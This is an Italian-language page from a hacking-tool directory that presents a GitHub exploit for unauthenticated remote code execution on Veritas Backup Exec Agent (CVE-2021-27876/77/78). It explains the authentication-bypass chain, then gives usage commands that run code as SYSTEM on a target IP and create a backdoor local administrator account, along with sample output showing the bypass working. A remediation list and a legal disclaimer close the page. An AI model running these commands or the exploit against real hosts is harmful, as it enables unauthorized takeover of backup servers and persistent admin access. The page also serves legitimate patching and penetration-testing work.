Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-27876 — Exploit RCE non autenticato per Veritas Backup Exec Agent (CVE-2021-27876/77/78) — bypass dell'autenticazione SHA fino a SYSTEM tramite NDMP | Kitploit
Strumenti/GitHubGitHub/wingerbijay/cve-2021-27876
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingCommand and ControlAutenticazione
GitHubwingerbijay/cve-2021-27876

CVE-2021-27876

Exploit RCE non autenticato per Veritas Backup Exec Agent (CVE-2021-27876/77/78) — bypass dell'autenticazione SHA fino a SYSTEM tramite NDMP

Vedi Repository
112 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-27876

Exploit RCE non autenticato per Veritas Backup Exec Agent (CVE-2021-27876/77/78) — bypass dell'autenticazione SHA verso SYSTEM tramite NDMP

CVE

CVEDescrizioneCVSS 3.1
CVE-2021-27876Bypass dell'autenticazione tramite manipolazione dell'hash SHA nel protocollo NDMP9.8 Critico
CVE-2021-27877Lettura arbitraria di file non autenticata tramite NDMP9.8 Critico
CVE-2021-27878Esecuzione arbitraria di comandi di sistema tramite NDMP_EXECUTE_COMMAND9.8 Critico

Advisory: Veritas VTS21-003

Versioni interessate

  • Backup Exec 16.x
  • Backup Exec 20.x
  • Backup Exec 21.x ≤ 21.2 (agent revision ≤ 9.3)

Corretto in: Backup Exec 21.3 e versioni successive.


Come funziona

L'agente Veritas Backup Exec è in ascolto su TCP/10000 e parla il protocollo NDMP (Network Data Management Protocol). L'exploit combina tre debolezze:

  1. Abuso dell'handshake TLS — L'agente richiede una CSR durante la sua negoziazione TLS personalizzata. L'exploit genera una CA locale, firma la CSR dell'agente e completa l'handshake, aggiornando il socket a TLS senza alcun segreto pre-condiviso.

  2. Bypass dell'autenticazione SHA (CVE-2021-27876) — L'autenticazione SHA di NDMP calcola SHA256('\x00' * 64 + challenge). Poiché la password viene anteposta come blocco di 64 byte con riempimento di zeri e non viene eseguita alcuna validazione lato server del materiale della password, qualsiasi client può autenticarsi come Administrator senza conoscere la password.

  3. NDMP_EXECUTE_COMMAND (CVE-2021-27878) — Una volta autenticati, il tipo di messaggio NDMP_EXECUTE_COMMAND esegue comandi di sistema arbitrari come NT AUTHORITY\SYSTEM. L'output viene reindirizzato a C:\Windows\Temp\_be_out.txt e letto tramite NDMP_FILE_READ.


Requisiti

Python 3.8+

Sulle distribuzioni moderne Python è contrassegnato come "gestito esternamente" (PEP 668), quindi installa la dipendenza in un ambiente virtuale:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate
pip install cryptography

Utilizzo

python3 be_rce.py

Esempi:

root@kitploit:~
# Confirm SYSTEM access
python3 be_rce.py 10.10.10.50 "whoami"

# Dump hostname and domain
python3 be_rce.py 10.10.10.50 "whoami /all"

# Add a local admin
python3 be_rce.py 10.10.10.50 "net user pwned P@ssw0rd123! /add"
python3 be_rce.py 10.10.10.50 "net localgroup administrators pwned /add"

Sample output:

[*] Connecting to 10.10.10.50:10000
[*] NDMP version: 9
[+] NDMP connection opened
[*] Generating CA certificate
[*] Got agent CSR (1024 bytes)
[*] Signed agent CSR and sent back
[*] SSL_HANDSHAKE CONNECT sent
[*] Upgrading to TLS
[+] TLS established
[*] Requesting SHA challenge
[*] Got 64-byte SHA challenge
[+] SHA authentication bypassed!
[*] Executing: whoami
[+] Command output:
────────────────────────────────────────
nt authority\system
────────────────────────────────────────

Rimedi

  • Aggiornare Veritas Backup Exec Agent alla versione 21.3 o successiva su tutti gli host
  • Limitare TCP/10000 agli host autorizzati per la gestione dei backup tramite firewall host e ACL di rete
  • Verificare tutti gli host che eseguono l'agente Backup Exec nel proprio ambiente

Riferimenti

  • https://www.veritas.com/support/en_US/security/VTS21-003
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27876
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27877
  • https://nvd.nist.gov/vuln/detail/CVE-2021-27878
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/veritas/beagent_sha_auth_rce.rb

Note legali

Questo strumento è fornito esclusivamente per test di penetrazione autorizzati e ricerca sulla sicurezza. L'utilizzo contro sistemi senza esplicita autorizzazione scritta è illegale. L'autore non si assume alcuna responsabilità per un uso improprio.

Scarica lo strumento